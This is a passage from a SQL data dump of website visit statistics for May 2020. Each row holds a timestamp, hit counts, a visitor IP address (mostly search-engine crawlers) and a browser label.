18,1,1,0,0,'66.249.70.72','chrome'),(502721,1588621173,2,2,0,0,'8.29.198.26','other'),(502722,1588621341,1,1,0,0,'66.249.64.36','chrome'),(502723,1588622096,1,1,0,0,'66.249.64.38','chrome'),(502724,1588623881,1,1,0,0,'66.249.70.70','chrome'),(502725,1588624415,2,2,0,0,'95.213.141.126','opera'),(502726,1588624769,8,8,0,0,'77.120.98.235','other'),(502727,1588625834,1,1,0,0,'157.55.39.205','other'),(502728,1588626243,1,1,0,0,'66.249.70.69','chrome'),(502729,1588626577,1,1,0,0,'66.249.70.70','chrome'),(502730,1588626693,1,0,1,0,'212.119.46.227',''),(502731,1588627769,1,1,0,0,'207.46.13.42','other'),(502732,1588627865,1,1,0,0,'157.55.39.205','other'),(502733,1588628017,2,2,0,0,'66.249.70.69','chrome'),(502734,1588628689,1,0,1,0,'66.249.70.70',''),(502735,1588628857,1,1,0,0,'207.46.13.42','other'),(502736,1588629446,1,1,0,0,'66.249.70.72','chrome'),(502737,1588630674,1,1,0,0,'66.249.64.36','chrome'),(502738,1588631345,1,1,0,0,'207.46.13.42','other'),(502739,1588631492,1,1,0,0,'66.249.70.72','chrome'),(502740,1588632003,1,1,0,0,'8.29.198.27','other'),(502741,1588632027,8,8,0,0,'77.120.98.235','other'),(502742,1588632407,1,1,0,0,'66.249.70.72','chrome'),(502743,1588632445,1,1,0,0,'8.29.198.26','other'),(502744,1588633256,1,1,0,0,'207.46.13.42','other'),(502745,1588634160,1,1,0,0,'207.46.13.42','other'),(502746,1588634397,2,2,0,0,'162.241.65.44','other'),(502747,1588635232,1,1,0,0,'207.46.13.52','other'),(502748,1588635244,2,2,0,0,'66.211.229.28','firefox'),(502749,1588635617,2,2,0,0,'207.46.13.42','other'),(502750,1588636105,1,1,0,0,'178.154.200.176','other'),(502751,1588636506,1,1,0,0,'62.205.134.182','other'),(502752,1588636579,1,1,0,0,'213.180.203.70','other'),(502753,1588636662,1,1,0,0,'157.245.222.154','other'),(502754,1588637016,1,1,0,0,'66.249.70.69','chrome'),(502755,1588637602,1,1,0,0,'178.154.200.92','other'),(502756,1588639128,1,1,0,0,'178.154.200.87','other'),(502757,1588639351,1,1,0,0,'66.249.70.69','chrome'),(502758,1588639730,1,1,0,0,'178.154.200.67','other'),(502759,1588639876,8,8,0,0,'77.120.98.235','other'),(502760,1588639922,1,1,0,0,'66.249.64.36','chrome'),(502761,1588639995,2,2,0,0,'207.46.13.42','other'),(502762,1588642384,1,1,0,0,'207.46.13.42','other'),(502763,1588642788,1,1,0,0,'213.180.203.142','other'),(502764,1588642839,1,1,0,0,'8.29.198.27','other'),(502765,1588643204,1,1,0,0,'66.249.64.36','chrome'),(502766,1588643270,1,1,0,0,'8.29.198.26','other'),(502767,1588643452,1,1,0,0,'66.249.70.70','chrome'),(502768,1588644585,1,1,0,0,'213.180.203.148','other'),(502769,1588644595,1,1,0,0,'66.249.64.33','chrome'),(502770,1588644835,1,1,0,0,'157.55.39.251','other'),(502771,1588645450,1,1,0,0,'207.46.13.52','other'),(502772,1588645658,1,1,0,0,'66.249.70.69','chrome'),(502773,1588646155,2,2,0,0,'157.55.39.163','other'),(502774,1588646567,1,1,0,0,'91.209.11.236','other'),(502775,1588647033,8,8,0,0,'77.120.98.235','other'),(502776,1588647040,1,1,0,0,'17.58.101.26','other'),(502777,1588647143,1,1,0,0,'66.249.70.69','chrome'),(502778,1588647448,1,1,0,0,'157.55.39.163','other'),(502779,1588648280,1,1,0,0,'178.154.200.196','other'),(502780,1588648622,1,1,0,0,'157.55.39.163','other'),(502781,1588648788,1,1,0,0,'157.55.39.205','other'),(502782,1588649023,1,1,0,0,'128.124.140.53','chrome'),(502783,1588649622,1,1,0,0,'157.55.39.163','other'),(502784,1588650749,1,1,0,0,'66.249.70.72','chrome'),(502785,1588651125,1,1,0,0,'178.154.200.87','other'),(502786,1588651241,1,1,0,0,'178.154.200.176','other'),(502787,1588651253,1,1,0,0,'62.4.16.5','other'),(502788,1588651480,1,1,0,0,'66.249.70.70','chrome'),(502789,1588652159,2,2,0,0,'66.249.64.36','chrome'),(502790,1588652764,1,1,0,0,'66.249.70.72','chrome'),(502791,1588652838,1,1,0,0,'157.55.39.163','other'),(502792,1588653620,1,1,0,0,'213.180.203.16','other'),(502793,1588653644,1,1,0,0,'157.55.39.251','other'),(502794,1588653668,1,1,0,0,'8.29.198.25','other'),(502795,1588653809,1,1,0,0,'62.205.134.182','other'),(502796,1588654100,1,1,0,0,'8.29.198.26','other'),(502797,1588654212,8,8,0,0,'77.120.98.235','other'),(502798,1588654567,1,1,0,0,'37.73.8.36','chrome'),(502799,1588654644,1,1,0,0,'66.249.70.70','chrome'),(502800,1588654817,1,1,0,0,'66.249.64.36','chrome'),(502801,1588656065,1,1,0,0,'2.47.39.217','other'),(502802,1588656776,1,1,0,0,'66.249.70.69','chrome'),(502803,1588657405,1,1,0,0,'157.55.39.251','other'),(502804,1588658405,1,1,0,0,'209.17.96.66','other'),(502805,1588659328,1,1,0,0,'213.180.203.16','other'),(502806,1588659791,2,2,0,0,'157.55.39.163','other'),(502807,1588660791,1,1,0,0,'66.249.64.33','chrome'),(502808,1588660941,1,1,0,0,'66.249.70.72','chrome'),(502809,1588661325,1,1,0,0,'92.112.176.94','chrome'),(502810,1588661412,8,8,0,0,'77.120.98.235','other'),(502811,1588661554,3,3,0,0,'66.249.70.69','chrome'),(502812,1588661568,1,1,0,0,'178.154.200.222','other'),(502813,1588662445,1,1,0,0,'213.180.203.16','other'),(502814,1588662805,4,4,0,0,'157.55.39.205','other'),(502815,1588663350,2,2,0,0,'157.55.39.163','other'),(502816,1588663354,3,3,0,0,'157.55.39.251','other'),(502817,1588663467,1,1,0,0,'66.249.70.69','chrome'),(502818,1588664157,1,1,0,0,'178.154.200.222','other'),(502819,1588664498,2,2,0,0,'8.29.198.25','other'),(502820,1588664583,1,1,0,0,'31.13.127.9','other'),(502821,1588664585,1,1,0,0,'31.13.127.4','other'),(502822,1588664591,1,1,0,0,'31.13.127.14','other'),(502823,1588664592,1,1,0,0,'31.13.127.12','other'),(502827,1588664593,1,1,0,0,'31.13.127.19','other'),(502828,1588665167,1,1,0,0,'178.154.200.220','other'),(502829,1588665514,2,2,0,0,'157.55.39.163','other'),(502830,1588665712,2,2,0,0,'178.154.200.222','other'),(502831,1588665820,1,1,0,0,'213.180.203.16','other'),(502832,1588666182,1,1,0,0,'66.249.70.70','chrome'),(502833,1588666380,1,1,0,0,'178.95.159.205','chrome'),(502834,1588666587,1,1,0,0,'157.55.39.251','other'),(502835,1588666639,1,1,0,0,'91.196.178.83','firefox'),(502836,1588666747,1,1,0,0,'157.55.39.163','other'),(502837,1588666914,2,2,0,0,'66.249.70.69','chrome'),(502838,1588667990,1,1,0,0,'66.249.70.69','chrome'),(502839,1588668295,1,1,0,0,'178.154.200.222','other'),(502840,1588668356,1,1,0,0,'66.249.70.72','chrome'),(502841,1588668494,1,1,0,0,'178.154.200.236','other'),(502842,1588669662,1,1,0,0,'178.154.200.220','other'),(502843,1588669841,1,1,0,0,'66.249.70.70','chrome'),(502844,1588670175,8,8,0,0,'77.120.98.235','other'),(502845,1588670380,1,1,0,0,'157.55.39.163','other'),(502846,1588670440,2,2,0,0,'157.55.39.79','other'),(502847,1588671208,1,1,0,0,'66.249.70.70','chrome'),(502848,1588672244,1,1,0,0,'157.55.39.163','other'),(502849,1588672253,1,1,0,0,'213.180.203.16','other'),(502850,1588672914,1,1,0,0,'66.249.70.69','chrome'),(502851,1588673963,1,1,0,0,'66.249.70.69','chrome'),(502852,1588674232,1,1,0,0,'66.249.64.36','chrome'),(502853,1588674302,1,1,0,0,'194.247.172.24','chrome'),(502854,1588674308,1,1,0,0,'3.135.195.242','chrome'),(502855,1588674479,1,1,0,0,'213.180.203.16','other'),(502856,1588675333,1,1,0,0,'178.154.200.222','other'),(502857,1588675338,2,2,0,0,'8.29.198.27','other'),(502858,1588675626,1,1,0,0,'69.171.251.30','other'),(502859,1588675972,1,1,0,0,'49.12.77.247','firefox'),(502860,1588676513,1,1,0,0,'157.55.39.79','other'),(502861,1588676693,2,2,0,0,'157.55.39.163','other'),(502862,1588676847,2,2,0,0,'66.249.70.69','chrome'),(502863,1588676890,1,1,0,0,'66.249.70.72','chrome'),(502864,1588677450,1,1,0,0,'157.55.39.205','other'),(502865,1588677482,1,1,0,0,'66.249.64.33','chrome'),(502866,1588677600,1,1,0,0,'66.249.64.38','chrome'),(502867,1588677652,4,4,0,0,'157.55.39.163','other'),(502868,1588677826,1,1,0,0,'66.249.70.69','chrome'),(502869,1588678297,1,1,0,0,'213.180.203.16','other'),(502870,1588678448,3,3,0,0,'157.55.39.205','other'),(502871,1588678506,3,3,0,0,'157.55.39.79','other'),(502872,1588678689,8,8,0,0,'77.120.98.235','other'),(502873,1588678741,1,1,0,0,'66.249.70.70','chrome'),(502874,1588679148,1,1,0,0,'178.154.200.196','other'),(502875,1588679678,2,2,0,0,'66.249.70.70','chrome'),(502876,1588680253,1,1,0,0,'178.154.200.222','other'),(502877,1588680600,3,3,0,0,'157.55.39.163','other'),(502878,1588680894,1,1,0,0,'66.249.70.69','chrome'),(502879,1588680951,1,1,0,0,'109.74.154.72','chrome'),(502880,1588681828,1,1,0,0,'131.220.6.152','chrome'),(502881,1588681857,1,1,0,0,'157.55.39.205','other'),(502882,1588681930,1,1,0,0,'178.154.200.220','other'),(502883,1588681932,1,1,0,0,'157.55.39.163','other'),(502884,1588682056,1,1,0,0,'66.249.70.72','chrome'),(502885,1588682202,1,1,0,0,'51.77.52.160','chrome'),(502886,1588682210,1,1,0,0,'91.196.178.173','firefox'),(502887,1588682706,2,1,1,0,'66.249.70.69',''),(502888,1588682755,1,1,0,0,'157.55.39.79','other'),(502889,1588682837,1,1,0,0,'213.180.203.16','other'),(502890,1588683253,1,1,0,0,'66.249.70.70','chrome'),(502891,1588683476,2,2,0,0,'157.55.39.163','other'),(502892,1588683974,1,1,0,0,'66.249.70.69','chrome'),(502893,1588684189,1,1,0,0,'66.249.70.72','chrome'),(502894,1588684348,1,1,0,0,'178.154.200.222','other'),(502895,1588685486,1,1,0,0,'213.180.203.16','other'),(502896,1588685739,2,2,0,0,'66.249.70.70','chrome'),(502897,1588685814,1,1,0,0,'66.249.70.72','chrome'),(502898,1588686169,2,2,0,0,'8.29.198.25','other'),(502899,1588686970,8,8,0,0,'77.120.98.235','other'),(502900,1588687016,1,1,0,0,'66.249.70.69','chrome'),(502901,1588687251,1,1,0,0,'157.55.39.79','other'),(502902,1588687863,2,2,0,0,'66.249.70.70','chrome'),(502903,1588688358,1,1,0,0,'178.154.200.222','other'),(502904,1588688739,2,2,0,0,'185.151.106.157','chrome'),(502905,1588688774,2,2,0,0,'66.249.70.70','chrome'),(502906,1588689083,1,1,0,0,'157.55.39.155','other'),(502907,1588689539,1,1,0,0,'66.249.70.69','chrome'),(502908,1588690270,1,1,0,0,'66.249.70.70','chrome'),(502909,1588690316,2,2,0,0,'157.55.39.155','other'),(502910,1588691009,1,1,0,0,'213.180.203.16','other'),(502911,1588691069,1,1,0,0,'77.74.177.113','chrome'),(502912,1588691357,1,1,0,0,'157.55.39.79','other'),(502913,1588691573,3,3,0,0,'157.55.39.155','other'),(502914,1588691895,1,1,0,0,'66.249.70.70','chrome'),(502915,1588692170,1,1,0,0,'178.154.200.222','other'),(502916,1588692706,1,1,0,0,'157.55.39.155','other'),(502917,1588692848,1,1,0,0,'194.247.172.24','chrome'),(502918,1588693203,1,1,0,0,'66.249.70.72','chrome'),(502919,1588693654,2,2,0,0,'178.154.200.222','other'),(502920,1588693805,1,1,0,0,'178.154.200.67','other'),(502921,1588694177,2,2,0,0,'66.249.70.70','chrome'),(502922,1588694295,2,2,0,0,'66.249.64.36','chrome'),(502923,1588694594,1,1,0,0,'178.154.200.222','other'),(502924,1588694640,1,1,0,0,'178.154.200.220','other'),(502925,1588694761,1,1,0,0,'157.55.39.79','other'),(502926,1588694773,8,8,0,0,'77.120.98.235','other'),(502927,1588696664,2,2,0,0,'157.55.39.205','other'),(502928,1588696674,3,3,0,0,'157.55.39.79','other'),(502929,1588696678,3,3,0,0,'157.55.39.155','other'),(502930,1588697009,1,1,0,0,'8.29.198.26','other'),(502931,1588697407,1,1,0,0,'8.29.198.27','other'),(502932,1588697690,1,1,0,0,'157.55.39.79','other'),(502933,1588697799,1,1,0,0,'178.154.200.196','other'),(502934,1588698038,1,1,0,0,'185.15.56.22','other'),(502935,1588698414,1,1,0,0,'66.249.70.72','chrome'),(502936,1588698633,1,1,0,0,'157.55.39.155','other'),(502937,1588699472,2,2,0,0,'178.154.200.222','other'),(502938,1588699473,2,2,0,0,'157.55.39.205','other'),(502939,1588699898,1,1,0,0,'157.55.39.79','other'),(502940,1588699943,1,1,0,0,'134.122.10.29','other'),(502941,1588699962,1,1,0,0,'66.249.64.38','chrome'),(502942,1588700370,1,1,0,0,'66.249.70.72','chrome'),(502943,1588700658,1,1,0,0,'178.154.200.22','other'),(502944,1588701307,1,1,0,0,'66.249.64.36','chrome'),(502945,1588701405,1,1,0,0,'66.249.64.33','chrome'),(502946,1588701827,2,2,0,0,'157.55.39.79','other'),(502947,1588702316,2,2,0,0,'178.154.200.222','other'),(502948,1588702438,1,1,0,0,'157.55.39.205','other'),(502949,1588702568,8,8,0,0,'77.120.98.235','other'),(502950,1588702884,1,1,0,0,'213.180.203.16','other'),(502951,1588703254,1,1,0,0,'213.180.203.70','other'),(502952,1588703449,1,1,0,0,'207.46.13.77','other'),(502953,1588703933,2,2,0,0,'207.46.13.78','other'),(502954,1588704038,1,1,0,0,'207.46.13.163','other'),(502955,1588704352,3,3,0,0,'178.154.200.222','other'),(502956,1588704938,1,1,0,0,'66.249.70.70','chrome'),(502957,1588705360,2,2,0,0,'213.180.203.16','other'),(502958,1588705601,1,1,0,0,'66.249.64.33','chrome'),(502959,1588705813,2,2,0,0,'178.154.200.222','other'),(502960,1588706109,1,1,0,0,'157.55.39.133','other'),(502961,1588706205,2,2,0,0,'207.46.13.163','other'),(502962,1588706319,1,1,0,0,'142.93.186.49','other'),(502963,1588706465,1,1,0,0,'178.154.200.220','other'),(502964,1588706625,2,2,0,0,'66.249.70.70','chrome'),(502965,1588706851,1,1,0,0,'178.154.200.222','other'),(502966,1588707372,2,2,0,0,'207.46.13.78','other'),(502967,1588707592,1,1,0,0,'66.249.70.69','chrome'),(502968,1588707849,1,1,0,0,'8.29.198.25','other'),(502969,1588708230,1,1,0,0,'8.29.198.26','other'),(502970,1588708658,1,1,0,0,'66.249.64.33','chrome'),(502971,1588708706,3,3,0,0,'178.154.200.222','other'),(502972,1588708882,1,1,0,0,'207.46.13.78','other'),(502973,1588709206,1,1,0,0,'178.154.200.196','other'),(502974,1588709570,2,2,0,0,'213.180.203.16','other'),(502975,1588709843,1,1,0,0,'91.196.178.93','firefox'),(502976,1588710031,1,1,0,0,'213.180.203.122','other'),(502977,1588710122,1,1,0,0,'213.180.203.148','other'),(502978,1588710124,1,1,0,0,'178.154.200.97','other'),(502979,1588710434,1,1,0,0,'66.249.70.70','chrome'),(502980,1588710651,1,1,0,0,'178.154.200.191','other'),(502981,1588710950,1,1,0,0,'66.249.64.38','chrome'),(502982,1588711097,8,8,0,0,'77.120.98.235','other'),(502983,1588711743,1,1,0,0,'176.37.20.175','firefox'),(502984,1588711783,2,2,0,0,'213.180.203.16','other'),(502985,1588711867,2,2,0,0,'178.154.200.222','other'),(502986,1588711909,2,2,0,0,'66.249.70.69','chrome'),(502987,1588712276,1,1,0,0,'178.154.200.112','other'),(502988,1588712900,2,2,0,0,'178.154.200.222','other'),(502989,1588713454,1,1,0,0,'213.180.203.90','other'),(502990,1588713608,1,1,0,0,'66.249.64.38','chrome'),(502991,1588713867,2,2,0,0,'66.249.70.70','chrome'),(502992,1588714193,2,2,0,0,'178.154.200.220','other'),(502993,1588714347,1,1,0,0,'213.180.203.29','other'),(502994,1588714474,2,2,0,0,'157.55.39.133','other'),(502995,1588714506,1,1,0,0,'207.46.13.78','other'),(502996,1588715223,1,1,0,0,'66.249.70.70','chrome'),(502997,1588715459,1,1,0,0,'178.154.200.222','other'),(502998,1588715641,1,1,0,0,'213.180.203.95','other'),(502999,1588716007,1,1,0,0,'207.46.13.80','other'),(503000,1588716128,1,1,0,0,'207.46.13.78','other'),(503001,1588716224,1,1,0,0,'66.249.70.72','chrome'),(503002,1588716439,1,1,0,0,'66.249.70.70','chrome'),(503003,1588716561,1,1,0,0,'213.180.203.16','other'),(503004,1588716782,2,2,0,0,'178.154.200.222','other'),(503005,1588718238,1,1,0,0,'178.154.200.222','other'),(503006,1588718684,2,2,0,0,'8.29.198.27','other'),(503007,1588719025,1,1,0,0,'178.154.200.176','other'),(503008,1588719163,8,8,0,0,'77.120.98.235','other'),(503009,1588719780,1,1,0,0,'178.154.200.222','other'),(503010,1588719797,1,1,0,0,'66.249.64.38','chrome'),(503011,1588719893,1,1,0,0,'66.249.64.36','chrome'),(503012,1588719915,1,1,0,0,'66.249.70.70','chrome'),(503013,1588720418,1,1,0,0,'207.46.13.80','other'),(503014,1588721433,1,1,0,0,'66.249.64.38','chrome'),(503015,1588721755,1,1,0,0,'66.249.70.69','chrome'),(503016,1588722025,1,1,0,0,'17.58.101.26','other'),(503017,1588722908,1,1,0,0,'62.205.134.182','other'),(503018,1588723025,2,2,0,0,'66.249.70.70','chrome'),(503019,1588723545,1,1,0,0,'157.55.39.133','other'),(503020,1588723594,2,2,0,0,'207.46.13.163','other'),(503021,1588723837,1,1,0,0,'207.46.13.80','other'),(503022,1588723898,1,1,0,0,'66.249.70.72','chrome'),(503023,1588724137,1,1,0,0,'91.209.11.236','other'),(503024,1588724232,1,1,0,0,'51.140.250.213','other'),(503025,1588725167,2,2,0,0,'66.249.70.69','chrome'),(503026,1588725400,2,2,0,0,'157.55.39.133','other'),(503027,1588725727,2,1,1,0,'66.249.70.70',''),(503028,1588725791,2,2,0,0,'66.249.64.38','chrome'),(503029,1588726287,2,2,0,0,'66.249.70.72','chrome'),(503030,1588726729,1,1,0,0,'207.46.13.160','other'),(503031,1588726749,1,1,0,0,'66.249.64.38','chrome'),(503032,1588726937,8,8,0,0,'77.120.98.235','other'),(503033,1588727178,1,1,0,0,'207.46.13.80','other'),(503034,1588727513,1,1,0,0,'66.249.70.70','chrome'),(503035,1588728493,1,1,0,0,'66.249.70.69','chrome'),(503036,1588728503,2,2,0,0,'66.249.70.70','chrome'),(503037,1588728684,1,1,0,0,'54.184.184.65','other'),(503038,1588729524,1,1,0,0,'8.29.198.27','other'),(503039,1588729887,1,1,0,0,'8.29.198.25','other'),(503040,1588732094,3,3,0,0,'207.46.13.160','other'),(503041,1588732246,1,1,0,0,'157.55.39.133','other'),(503042,1588732896,1,1,0,0,'207.46.13.40','other'),(503043,1588732971,1,1,0,0,'207.46.13.78','other'),(503044,1588733127,1,1,0,0,'213.180.203.16','other'),(503045,1588733405,2,2,0,0,'178.154.200.222','other'),(503046,1588733459,1,1,0,0,'178.154.200.97','other'),(503047,1588734100,2,2,0,0,'66.249.70.72','chrome'),(503048,1588734183,1,1,0,0,'66.249.64.33','chrome'),(503049,1588734536,8,8,0,0,'77.120.98.235','other'),(503050,1588734770,5,5,0,0,'178.154.200.222','other'),(503051,1588734850,1,1,0,0,'213.180.203.16','other'),(503052,1588735456,1,1,0,0,'66.249.70.69','chrome'),(503053,1588735499,1,1,0,0,'66.249.64.38','chrome'),(503054,1588735782,1,1,0,0,'207.46.13.165','other'),(503055,1588735920,2,2,0,0,'213.180.203.16','other'),(503056,1588736470,1,1,0,0,'178.154.200.222','other'),(503057,1588736637,1,1,0,0,'178.154.200.196','other'),(503058,1588736869,1,1,0,0,'207.46.13.39','other'),(503059,1588736974,2,2,0,0,'66.249.70.70','chrome'),(503060,1588737114,1,1,0,0,'213.180.203.16','other'),(503061,1588737360,1,1,0,0,'213.180.203.140','other'),(503062,1588737415,1,1,0,0,'66.249.70.69','chrome'),(503063,1588737727,1,1,0,0,'66.249.64.38','chrome'),(503064,1588738225,1,1,0,0,'207.46.13.160','other'),(503065,1588738242,1,1,0,0,'207.46.13.165','other'),(503066,1588738534,2,2,0,0,'66.249.70.70','chrome'),(503067,1588738914,1,1,0,0,'178.154.200.222','other'),(503068,1588739391,1,1,0,0,'69.171.251.19','other'),(503069,1588739392,1,1,0,0,'69.171.251.7','other'),(503070,1588740064,1,1,0,0,'66.249.70.69','chrome'),(503071,1588740288,3,3,0,0,'178.154.200.222','other'),(503072,1588740334,1,1,0,0,'62.205.134.182','other'),(503073,1588740355,2,2,0,0,'8.29.198.27','other'),(503074,1588741311,1,1,0,0,'66.249.70.72','chrome'),(503075,1588741471,1,1,0,0,'178.154.200.92','other'),(503076,1588742003,1,1,0,0,'178.154.200.222','other'),(503077,1588742278,1,1,0,0,'213.180.203.16','other'),(503078,1588742415,8,8,0,0,'77.120.98.235','other'),(503079,1588742473,1,1,0,0,'66.249.64.36','chrome'),(503080,1588742678,1,1,0,0,'66.249.70.72','chrome'),(503081,1588743168,3,3,0,0,'178.154.200.222','other'),(503082,1588743468,1,1,0,0,'91.196.178.70','chrome'),(503083,1588744001,1,1,0,0,'66.249.64.36','chrome'),(503084,1588744015,1,1,0,0,'207.46.13.165','other'),(503085,1588744543,1,1,0,0,'178.154.200.222','other'),(503086,1588745282,2,2,0,0,'213.180.203.16','other'),(503087,1588745583,2,2,0,0,'178.154.200.222','other'),(503088,1588745669,1,1,0,0,'66.249.70.69','chrome'),(503089,1588745726,1,1,0,0,'31.13.127.14','other'),(503090,1588745727,1,1,0,0,'31.13.127.3','other'),(503093,1588745928,1,1,0,0,'66.249.64.38','chrome'),(503094,1588746092,1,1,0,0,'213.180.203.148','other'),(503095,1588746341,1,1,0,0,'207.46.13.165','other'),(503096,1588746504,1,1,0,0,'178.154.200.236','other'),(503097,1588746544,1,1,0,0,'91.196.178.70','chrome'),(503098,1588746586,1,1,0,0,'207.46.13.39','other'),(503099,1588746606,1,1,0,0,'66.249.70.72','chrome'),(503100,1588746713,1,1,0,0,'66.249.70.70','chrome'),(503101,1588746776,1,1,0,0,'178.154.200.222','other'),(503102,1588747681,1,1,0,0,'213.180.203.17','other'),(503103,1588747776,1,1,0,0,'213.180.203.16','other'),(503104,1588748403,1,1,0,0,'66.249.64.33','chrome'),(503105,1588748435,3,3,0,0,'66.249.70.70','chrome'),(503106,1588748801,1,1,0,0,'66.249.70.69','chrome'),(503107,1588749591,1,1,0,0,'91.196.178.72','chrome'),(503108,1588750060,1,1,0,0,'66.249.70.70','chrome'),(503109,1588750084,1,1,0,0,'91.196.177.46','chrome'),(503110,1588750146,1,1,0,0,'66.249.70.72','chrome'),(503111,1588750233,8,8,0,0,'77.120.98.235','other'),(503112,1588751180,1,1,0,0,'213.180.203.16','other'),(503113,1588751184,2,2,0,0,'8.29.198.26','other'),(503114,1588751217,1,1,0,0,'178.154.200.222','other'),(503115,1588751311,2,2,0,0,'66.249.70.72','chrome'),(503116,1588752026,1,1,0,0,'31.13.127.3','other'),(503117,1588752027,1,1,0,0,'31.13.127.1','other'),(503118,1588752099,1,1,0,0,'91.196.178.70','chrome'),(503119,1588752140,1,1,0,0,'91.196.177.193','firefox'),(503120,1588752238,1,1,0,0,'207.46.13.165','other'),(503121,1588752242,1,1,0,0,'207.46.13.39','other'),(503122,1588752248,1,1,0,0,'207.46.13.160','other'),(503123,1588752252,3,3,0,0,'207.46.13.40','other'),(503124,1588752313,2,2,0,0,'66.249.70.70','chrome'),(503125,1588752528,2,2,0,0,'66.249.70.69','chrome'),(503126,1588752681,2,2,0,0,'178.154.200.222','other'),(503127,1588752951,1,1,0,0,'195.10.210.70','chrome'),(503128,1588753337,1,1,0,0,'66.249.64.36','chrome'),(503129,1588753359,1,1,0,0,'207.46.13.160','other'),(503130,1588753800,1,1,0,0,'104.36.18.251','chrome'),(503131,1588753833,1,1,0,0,'134.122.97.157','chrome'),(503132,1588754104,1,1,0,0,'51.91.129.4','firefox'),(503133,1588754119,1,1,0,0,'207.46.13.40','other'),(503134,1588754304,1,1,0,0,'178.154.200.222','other'),(503135,1588754308,1,1,0,0,'66.249.64.38','chrome'),(503136,1588754541,1,1,0,0,'66.249.70.69','chrome'),(503137,1588755514,2,2,0,0,'178.154.200.222','other'),(503138,1588755896,3,3,0,0,'66.249.70.69','chrome'),(503139,1588756044,2,2,0,0,'5.9.156.121','other'),(503140,1588756506,1,1,0,0,'66.249.64.33','chrome'),(503141,1588756757,1,1,0,0,'91.196.178.70','chrome'),(503142,1588757456,1,1,0,0,'207.46.13.39','other'),(503143,1588757632,1,1,0,0,'18.221.119.119','chrome'),(503144,1588757724,1,1,0,0,'66.249.70.70','chrome'),(503145,1588758078,8,8,0,0,'77.120.98.235','other'),(503146,1588758860,2,2,0,0,'66.249.70.69','chrome'),(503147,1588758912,1,1,0,0,'93.124.54.130','chrome'),(503148,1588759149,1,1,0,0,'178.154.200.236','other'),(503149,1588759689,1,1,0,0,'78.137.24.228','chrome'),(503150,1588759779,1,1,0,0,'66.249.70.72','chrome'),(503151,1588760227,1,1,0,0,'178.154.200.67','other'),(503152,1588761038,1,1,0,0,'207.46.13.160','other'),(503153,1588761461,1,1,0,0,'66.249.64.46','chrome'),(503154,1588761870,1,1,0,0,'109.74.154.72','chrome'),(503155,1588762011,1,1,0,0,'8.29.198.26','other'),(503156,1588762050,1,1,0,0,'66.249.70.72','chrome'),(503157,1588762367,1,1,0,0,'8.29.198.27','other'),(503158,1588763030,1,1,0,0,'66.249.70.70','chrome'),(503159,1588763234,2,2,0,0,'95.213.141.126','opera'),(503160,1588764082,1,1,0,0,'213.180.203.16','other'),(503161,1588764500,1,1,0,0,'207.46.13.39','other'),(503162,1588765161,1,1,0,0,'66.249.70.70','chrome'),(503163,1588765218,1,1,0,0,'94.153.134.142','chrome'),(503164,1588765426,1,1,0,0,'66.249.70.72','chrome'),(503165,1588765667,1,1,0,0,'66.249.64.38','chrome'),(503166,1588765884,8,8,0,0,'77.120.98.235','other'),(503167,1588766171,1,1,0,0,'209.17.96.90','other'),(503168,1588766472,1,1,0,0,'91.196.178.156','chrome'),(503169,1588767275,1,1,0,0,'66.249.70.69','chrome'),(503170,1588767281,1,1,0,0,'91.196.178.139','chrome'),(503171,1588767296,2,2,0,0,'178.154.200.222','other'),(503172,1588767300,4,4,0,0,'207.46.13.39','other'),(503173,1588767304,1,1,0,0,'207.46.13.40','other'),(503174,1588767310,1,1,0,0,'207.46.13.160','other'),(503175,1588767874,1,1,0,0,'66.249.70.70','chrome'),(503176,1588768525,1,1,0,0,'193.201.216.230','chrome'),(503177,1588769192,5,5,0,0,'178.154.200.222','other'),(503178,1588769938,1,1,0,0,'178.154.200.67','other'),(503179,1588769941,2,2,0,0,'66.249.70.70','chrome'),(503180,1588770103,1,1,0,0,'91.124.118.187','chrome'),(503181,1588770137,1,1,0,0,'91.196.179.33','chrome'),(503182,1588770456,1,1,0,0,'207.46.13.40','other'),(503183,1588770579,1,1,0,0,'178.154.200.222','other'),(503184,1588770823,1,1,0,0,'66.249.64.33','chrome'),(503185,1588771799,1,1,0,0,'178.154.200.196','other'),(503186,1588771850,2,2,0,0,'207.46.13.10','other'),(503187,1588772018,1,1,0,0,'66.249.70.69','chrome'),(503188,1588772050,1,1,0,0,'66.249.64.36','chrome'),(503189,1588772617,1,1,0,0,'178.154.200.222','other'),(503190,1588772841,2,2,0,0,'8.29.198.26','other'),(503191,1588772958,2,2,0,0,'207.46.13.10','other'),(503192,1588772976,1,1,0,0,'66.249.70.70','chrome'),(503193,1588773252,1,1,0,0,'91.196.178.134','chrome'),(503194,1588773818,8,8,0,0,'77.120.98.235','other'),(503195,1588774310,1,1,0,0,'66.249.70.70','chrome'),(503196,1588774412,1,1,0,0,'131.220.6.152','chrome'),(503197,1588775109,1,1,0,0,'37.73.151.195','chrome'),(503198,1588775255,1,1,0,0,'91.196.178.75','firefox'),(503199,1588776309,1,1,0,0,'207.46.13.10','other'),(503200,1588776530,2,2,0,0,'178.154.200.222','other'),(503201,1588776762,1,1,0,0,'66.249.70.70','chrome'),(503202,1588776829,1,1,0,0,'66.249.70.69','chrome'),(503203,1588779066,1,1,0,0,'66.249.70.69','chrome'),(503204,1588779624,2,2,0,0,'207.46.13.10','other'),(503205,1588779837,1,1,0,0,'207.46.13.40','other'),(503206,1588780158,1,1,0,0,'66.249.64.38','chrome'),(503207,1588780382,1,1,0,0,'91.196.178.156','chrome'),(503208,1588781606,1,1,0,0,'81.24.208.89','other'),(503209,1588781903,8,8,0,0,'77.120.98.235','other'),(503210,1588782219,1,1,0,0,'95.134.185.50','chrome'),(503211,1588782695,2,2,0,0,'66.249.70.70','chrome'),(503212,1588782920,1,1,0,0,'66.249.64.38','chrome'),(503213,1588783106,1,1,0,0,'213.180.203.95','other'),(503214,1588783136,1,1,0,0,'66.249.70.72','chrome'),(503215,1588783168,2,2,0,0,'66.249.70.69','chrome'),(503216,1588783674,1,1,0,0,'8.29.198.26','other'),(503217,1588783750,1,1,0,0,'66.249.64.33','chrome'),(503218,1588783900,1,1,0,0,'66.249.70.70','chrome'),(503219,1588784024,1,1,0,0,'8.29.198.25','other'),(503220,1588784793,2,2,0,0,'66.249.70.69','chrome'),(503221,1588785632,1,1,0,0,'91.196.178.163','chrome'),(503222,1588785707,1,1,0,0,'17.58.101.26','other'),(503223,1588785840,1,1,0,0,'94.130.9.183','other'),(503224,1588786274,1,1,0,0,'178.154.200.220','other'),(503225,1588786626,2,2,0,0,'17.58.101.26','other'),(503226,1588786805,1,1,0,0,'66.249.70.69','chrome'),(503227,1588786850,1,1,0,0,'207.46.13.40','other'),(503228,1588787335,1,1,0,0,'178.154.200.